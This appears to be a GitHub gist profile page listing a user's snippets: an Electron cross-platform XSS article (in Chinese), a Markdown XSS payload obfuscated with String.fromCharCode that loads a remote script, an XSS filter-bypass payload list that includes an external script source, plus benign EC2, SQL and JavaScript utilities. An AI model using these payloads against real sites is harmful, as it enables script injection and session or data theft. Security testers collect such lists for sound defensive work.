Skip to content

Instantly share code, notes, and snippets.

View kienluu's full-sized avatar

Kien kienluu

7 followers · 4 following
View GitHub Profile
@kienluu
kienluu / content.md
Created February 26, 2018 00:27 — forked from baymaxium/content.md
Electron hack —— 跨平台 XSS

原文:前端那些事儿

基于 Electron 的 XSS 攻击实例,远比你想象的简单。

什么是 Electron

也许你从未听说过跨平台 XSS,也从未听说过 Electron, 但你肯定知道 GitHub,或者使用过著名的 Atom 编辑器, 比如正在尝试翻译这篇文章的笔者,正在使用 Atom 来编写 Markdown。 Electron 优秀的跨平台特性,是本文的基础。简单来说,Electron 是一个框架,用于方便开发者创建跨平台应用。 开发者可以通过它来使用 HTML + JavaScript 来开发桌面应用。 Electron 的用户非常广泛,因为它确实可以为不同平台提供同样的体验。

与传统观念的所谓“桌面应用”不同, Electron 应用包括两个部分(Node.js 和 Chromium)作为运行环境。 分别支持一个主进程和一个渲染进程, 其中,主进程是一个非常 Node.js 风格的进程, 而渲染进程是一个可以运行 Node.js 代码的 Chromium 内核浏览器。

@kienluu
kienluu / gist:29abf2496403d740520df306f2ac742f
Created February 25, 2018 23:21 — forked from mediaupstream/gist:3857950
Cornify XSS Markdown

Want to add Cornify (http://www.cornify.com/) to a website that has a Markdown XSS exploit?

![uh](http://example.com"onerror="javascript:eval\(String\.fromCharCode\(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,99,111,114,110,105,102,121,46,99,111,109,47,106,115,47,99,111,114,110,105,102,121,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,123,32,99,111,114,110,105,102,121,95,97,100,100,40,41,32,125,44,32,49,48,48,48,41,59\)\))

The above code does this:

var s=document.createElement('script'); s.src='http://www.cornify.com/js/cornify.js';document.getElementsByTagName('head')[0].append

@kienluu
kienluu / xxsfilterbypass.lst
Created February 25, 2018 19:13 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@kienluu
kienluu / ec2configs.yml
Last active November 19, 2016 03:09
ec2 ssh login helper
default_region: eu-west-1
host_aliases:
--- These are the dictionary of host_alias values to pass to the ec2ip.py command
deis-staging:
user: admin
identity: ~/.ssh/kube_aws_rsa
filters:
- Name: tag:Name
Values:
- staging-k8s-minion
@kienluu
kienluu / foreignkey snippet
Created January 7, 2016 15:13
SELECT tc.table_name AS foreign_table_name,
kcu.column_name AS foreign_column_name,
ccu.table_name AS TABLE_NAME,
ccu.column_name AS COLUMN_NAME
FROM information_schema.table_constraints AS tc
JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name
WHERE constraint_type = 'FOREIGN KEY'
AND ccu.TABLE_NAME='core_user';
@kienluu
kienluu / gist:4946472
Created February 13, 2013 17:42
Short javascript snippet to get url query variables as a javascript object (key value object).
function getQueryDict() {
// Note this function dont deal with duplicate key names like in django.
var params = location.search.substr(1).split('&');
var queryDict = {};
for (var index in params){
var str = params[index].split('=');
var key = str[0];
var val = decodeURI(str[1]);
queryDict[key] = val;
}